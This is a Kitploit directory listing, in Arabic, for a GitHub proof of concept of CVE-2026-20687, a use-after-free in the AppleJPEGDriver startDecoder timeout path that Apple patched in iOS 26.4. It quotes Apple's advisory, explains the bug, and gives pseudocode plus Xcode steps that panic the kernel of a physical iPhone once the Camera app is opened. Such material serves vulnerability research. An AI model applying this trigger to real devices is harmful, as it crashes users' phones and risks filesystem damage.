Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-20687-AppleJPEGDriver-UAF — CVE-2026-20687: ثغرة أمنية في AppleJPEGDriver startDecoder Timeout UAF — ثغرة في نواة iOS/macOS تؤدي إلى تعطل مؤجل (A19 Pro، iOS 26.3 RC) | Kitploit
أدوات/GitHubGitHub/enfilade-labs/cve-2026-20687-applejpegdriver-uaf
أمان iOSتحليل الذاكرة الجنائيتحليل الثغرات الأمنيةالاستغلالالهندسة العكسيةأمن الجوالاستغلال الملفات الثنائية
GitHubenfilade-labs/cve-2026-20687-applejpegdriver-uaf

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →

CVE-2026-20687-AppleJPEGDriver-UAF

CVE-2026-20687: ثغرة أمنية في AppleJPEGDriver startDecoder Timeout UAF — ثغرة في نواة iOS/macOS تؤدي إلى تعطل مؤجل (A19 Pro، iOS 26.3 RC)

عرض المستودع
2منذ 4 أشهرلم تتم المراجعة بعد
مشاركة

CVE-2026-20687 — استغلال UAF في مهلة startDecoder في AppleJPEGDriver

CVE-2026-20687 · Enfilade · enfilade.io

المكوّن: Kernel

التأثير: قد يتمكن تطبيق من التسبب في إنهاء غير متوقع للنظام أو كتابة في ذاكرة kernel.

الوصف: تمت معالجة مشكلة استخدام بعد التحرير (use after free) من خلال تحسين إدارة الذاكرة.

— Apple Security Content, iOS 26.4 and iPadOS 26.4

الهدف

iOS26.3 (23D125) (تم اختباره)
macOS—
المكوّنAppleJPEGDriver
الإصدار المُصحَّحiOS 26.4 / iPadOS 26.4
العتادiPhone18,2 (iPhone 17 Pro Max, A19 Pro)

تحذير

سيؤدي تشغيل PoC إلى انهيار kernel للجهاز. احفظ عملك قبل التشغيل. قد تتسبب حالات الانهيار المتكررة في تلف نظام الملفات. لأغراض البحث الأمني فقط.

الثغرة

يقوم مسار المهلة في startDecoder_sync بتحرير طلب ولكنه يترك مؤشر العقدة المضمّن في قائمة الانتظار داخل المتجه الخاص بكل برنامج ترميز. لاحقًا، يقوم اجتياز قائمة الانتظار بإلغاء الإشارة إلى العقدة القديمة وينهار kernel تحت فرض فحص علامات MTE. عادةً ما يتم تأجيل الانهيار حتى يتم تنفيذ فك ترميز JPEG متزامن لاحق — على iPhone يحدث هذا بشكل موثوق عند فتح تطبيق الكاميرا.

إثبات المفهوم

root@kitploit:~
// يُهيئ برنامج التشغيل؛ عادةً ما يتم تأجيل الانهيار حتى فتح الكاميرا.
IOServiceOpen("AppleJPEGDriver");
for (int i = 0; i < N; i++) {
    startDecoder_async();                   // queue_io_gated: vector.push(req + 0x78)
}
IOServiceClose(conn);

// لاحقًا، يؤدي فتح الكاميرا إلى تشغيل:
startDecoder_sync();
    queue_io_gated: vector.push(req + 0x78);
    wait(10s) -> TIMEOUT;
    pool_free(req);                         // BUG: لا يُزيل من قائمة الانتظار (req + 0x78)

// لاحقًا أيضًا (finish_io_gated):
fullSpeedRequestExist():
    node_ptr = vector[i];                   // قديم: node_ptr == (freed req + 0x78)
    req2 = *(node_ptr + 0x8);               // قراءة UAF -> خطأ علامة MTE -> انهيار

البناء والتشغيل

  1. افتح ios-app/Test.xcodeproj في Xcode.
  2. اختر جهاز iOS فعليًا (لن يصل المحاكي إلى برنامج التشغيل).
  3. قم بالبناء والتشغيل، ثم اضغط على Panic (يهيئ برنامج التشغيل ويُدرج عملًا غير متزامن في قائمة الانتظار).
  4. افتح تطبيق الكاميرا لتفعيل الانهيار المؤجل.

الترخيص

انظر LICENSE.

تنزيل الأداة